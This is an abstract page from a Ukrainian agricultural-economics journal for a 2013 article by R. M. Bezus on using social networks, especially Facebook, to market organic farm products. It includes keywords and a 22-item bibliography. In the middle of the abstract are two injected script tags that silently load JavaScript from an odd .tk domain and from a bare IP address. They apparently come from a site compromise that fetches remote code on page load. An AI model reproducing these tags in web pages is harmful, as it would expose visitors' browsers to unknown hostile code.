ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 004:388.439:4
Економіка агропромислового виробництва

Соціальні мережі у просуванні продукції органічного агровиробництва / Безус Р. М. // Економіка АПК. - 2013. - № 5 - С. 25

Розглянуто роль відкритих соціальних мереж у формуванні довіри споживачів і перспективи використання таких мереж для реалізації продукції органічного агровиробництва. Визначено соціальну мережу з найбільшою чисельністю зареєстрованих учасників ринку органічного агровиробництва та його прихильників. Наведено реальну ситуацію щодо використання потенціалу розрахунку платіжними картками за товари і послуги в Україні, в тому числі й тими, що придбані у відкритих соціальних мережах. Встановлено чисельність учасників Facebook, які є потенційними покупцями органічної продукції, а також представників вітчизняного ринку органічного агровиробництва в соціальних мережах. Табл.: 1. Рис.: 5. Бібліогр.: 22.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: відкриті соціальні мережі, органічне агровиробництво, ринок органічної продукції, попит на органічну продукцію, довіра до соціальних мереж, покупці органічної продукції

Список використаних джерел

 1. Білорусь: результати дослідження ринку органічних продуктів [Електронний ресурс]. – Режим доступу : http://www.organic.ua/uk/events/ ukevents/390– bilorus– rezultaty– doslidzhennja– rynku– organichnyh– produktiv.
 2. Вебер Л. Эффективный маркетинг в Интернете. Социальные сети, блоги, Твиттер Twitter и другие инструменты продвижения в Сети / Л. Вебер. – К.: Ирина-Прес, 2010. – 296 с.
 3. Вертайм К. Цифровой маркетинг. Как увеличить продажи с помощью социальных сетей, блогов, вики-ресурсов, мобильных телефонов и других современных технологий / Кент Вертайм, Ян Фенвик. – М.: Альпина Паблишерз, Юрайт, 2010.–284 с.
 4. Вирин Ф. Интернет-маркетинг. Полный сборник практических инструментов / Ф. Вирин – М.: Эксмо, 2010. – 224 с.
 5. Заячковська Г.А. Соціальні мережі як засіб просування вітчизняного туристичного продукту на світовому ринку / Г.А. Заячковська / Проблеми раціонального використання соціально-економічного та природно-ресурсного потенціалу регіону: фінансова політика та інвестиції // Зб. наук. праць: Вип. XVІІ. – № 1. – К.: СЕУ ; Рівне: НУВГП, 2011. – С.189-197.
 6. Кількість користувачів Facebook перевищила мільярд [Електронний ресурс]. – Режим доступу : http://www.bbc.co.uk/ukrainian/science/2012/10 /121010_facebook_billion_nk.shtml.
 7. Меркулова Т.В. Моделирование динамики социальных сетей / Т.В. Меркулова, Е.Ю. Кононова // БизнесИнформ. – 2009. – № 2 (1). – С. 44–48.
 8. На каких сайтах украинцы тратят деньги [Електронний ресурс]. – Режим доступу : http://businessua.com/finance/na-kakih-saitah-ukraincy-tratyat-dengi1530.html.
 9. Ринок органічної продукції та Україна [Електронний ресурс]. – Режим доступу : http://www.biolan.org.ua/uk/news/?newsid=111.
 10. Сетевой маркетинг // Корреспондент. – 2011. – № 46. – 25 нояб. – С.48-50.
 11. Слобода К. Технічні засоби соціальних мереж для формування аудиторії веб-форуму / К. Слобода, А. Пелищишин, О. Тимовчак-Максимець // Комп'ютерні науки та інформаційні технології : [зб. наук. праць] ; відповід. ред. Ю.М. Рашкевич. – Львів : Вид-во Львівської політехніки, 2011. – 436 c. – (Вісн. Нац. ун-ту "Львівська політехніка" ; № 694). – С. 67-74.
 12. Украинцы хотят есть качественную еду, но не хотят читать о ее составе [Електронний ресурс]. – Режим доступу: http://bzp.net.ua/news/1720/.
 13. Ульянченко О.В. Всесвітня мережа Інтернет як канал збуту органічної продукції / О.В. Ульянченко, Р.М. Безус // Економіка АПК. – 2012. – № 4. – С 128-134.
 14. Baromètre de consommation et de perception des produits biologiques en France. Edition 2011. Agence Bio. – 123 р.
 15. Danah M. Boyd / Nicole B. Ellison Social Network Sites: Definition, History, and Scholarship. Journal of Computer-Mediated Communication Volume 13, Issue 1, p. 210–230, October 2007.
 16. Facebook Statistics [Електронний ресурс]. – Режим доступу: http://www.socialbakers.com.
 17. How Social Network Marketing Works [Електронний ресурс]. – Режим доступу : http://www.theecommercesolution.com/blog/2007/05/01/how-social-network-marketing-works.
 18. Mom study 2012 final 8.2.12 [Електронний ресурс]. – Режим доступу: http://www.slideshare.net/BlogHer/mom-study-2012-final-8212.
 19. The influence game: how news is sourced and managed today. Oriella PR network global digital ournalism study 2012 [Електронний ресурс]. – Режим доступу: http://www.oriellaprnetwork.com/research.
 20. Ukraine Facebook Statistics [Електронний ресурс]. – Режим доступу : http://www.socialbakers.com/facebook-statistics/ukraine/last-3-months.
 21. Word of Mouth Marketing Association [Електронний ресурс]. – Режим доступу : http://womma.org/events/education/
 22. Willer, Helga (2011) Organic Agriculture Worldwide Key results from the global survey on organic agriculture 2011. Research Institute of Organic Agriculture, FiBL, Switzerland.
Читати статтю: 13_05_04.pdf